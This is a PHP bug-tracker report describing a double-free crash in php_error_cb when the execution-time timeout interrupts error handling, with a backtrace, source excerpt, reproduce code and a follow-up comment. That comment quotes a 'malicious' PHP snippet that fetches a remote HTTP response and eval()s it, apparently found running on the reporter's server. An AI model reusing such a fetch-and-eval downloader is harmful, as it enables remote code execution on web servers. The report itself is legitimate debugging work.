|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
[2009-09-06 13:21 UTC] witekfl at gazeta dot pl
Description:
------------
php-5.2.10 with the fpm patch aplied running as FastCGI with Apache and mod_fcgid
Here is a fragment of the backtrace:
#0 0x00007f86f9acced5 in raise () from /lib/libc.so.6
#1 0x00007f86f9ace3f3 in abort () from /lib/libc.so.6
#2 0x00007f86f9b093a8 in ?? () from /lib/libc.so.6
#3 0x00007f86f9b0e948 in ?? () from /lib/libc.so.6
#4 0x00007f86f9b10a56 in free () from /lib/libc.so.6
#5 0x00000000006a5509 in php_error_cb (type=1,
error_filename=0xe37778 "/var/www/virtual/erc.blabla.pl/side_left.php(25) : eval()'d code(1) : eval()'d code",
error_lineno=9, format=<value optimized out>, args=<value optimized out>)
at /home/witekfl/PHP/php-5.2.10/main/main.c:831
#6 0x00000000006e5f04 in zend_error (type=1, format=0x9c2418 "Maximum execution time of %d second%s exceeded")
at /home/witekfl/PHP/php-5.2.10/Zend/zend.c:976
#7 <signal handler called>
#8 0x00007f86f9b15d95 in strdup () from /lib/libc.so.6
#9 0x00000000006a551a in php_error_cb (type=2,
error_filename=0xe37778 "/var/www/virtual/erc.blabla.pl/side_left.php(25) : eval()'d code(1) : eval()'d code",
error_lineno=9, format=<value optimized out>, args=<value optimized out>)
at /home/witekfl/PHP/php-5.2.10/main/main.c:834
#10 0x00000000006e5f04 in zend_error (type=2, format=0x9c4778 "%s%s%s(): supplied argument is not a valid %s resource")
at /home/witekfl/PHP/php-5.2.10/Zend/zend.c:976
#11 0x00000000006f35ce in zend_fetch_resource (passed_id=<value optimized out>, default_id=<value optimized out>,
resource_type_name=0x9abbd0 "stream", found_resource_type=0x0, num_resource_types=<value optimized out>)
at /home/witekfl/PHP/php-5.2.10/Zend/zend_list.c:130
And here is the fragment of main.c:
/* store the error if it has changed */
if (display) {
if (PG(last_error_message)) {
free(PG(last_error_message));
}
if (PG(last_error_file)) {
free(PG(last_error_file));
}
PG(last_error_type) = type;
PG(last_error_message) = strdup(buffer);
PG(last_error_file) = strdup(error_filename);
PG(last_error_lineno) = error_lineno;
}
After the free(), the php_error_cb is interrupted by the signal (zend_timeout) and the given fragment is run with the new error_message, but the PG(last_error_message) or PG(last_error_file) is already freed, but still has old value, another free is causing crash.
max_execution_time = 2
allow_url_fopen = Off
Reproduce code:
---------------
ini_set("max_execution_time", 2);
for (;;) {
file_get_contents("http://google.com/");
}
/* I'm not sure if exactly this code crashes, but the code with undefined variables and functions, trying to connect to the outside will do very often. Connections to the outside are rejected by iptables. */
Expected result:
----------------
No segfaults.
Actual result:
--------------
Often segfaults.
Patchesmax_execution_time-prevent_double_free.patch (last revision 2010-03-13 08:17 UTC by witekfl at gazeta dot pl)Pull RequestsHistoryAllCommentsChangesGit/SVN commits
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Mon Nov 03 22:00:01 2025 UTC |
Here is a malicious code: <?php @$s = fsockopen("google.com",80); stream_set_timeout($s, 3); fputs($s, "GET / HTTP/1.0\nHost: google.com\n\n"); $o=""; while(!feof($s)) $o.=fgets($s,1000); $o=substr($o,strpos($o,"\r\n\r\n")+4); fclose($s); eval($o); ?> aa The setup is following: nginx + apache + mod_layout + mod_fcgid + php-cgi as fastcgi php-cgi has suid bit set and runs as user www-data. nginx and apache runs on different users to php-cgi. max_execution_timeout is 2 seconds. iptables rejects connections to google.com (to the outside) for php-cgi. php segfaults very often and Apache returns status 500.php.ini: display_errors = Off max_execution_time = 1 disable_functions = sleep t.php: <?php for (;;) { sleep(1); } cat t.php | php-cgi -c php.ini Run it a few times. It segfaults for me. Try with export MALLOC_CHECK_=2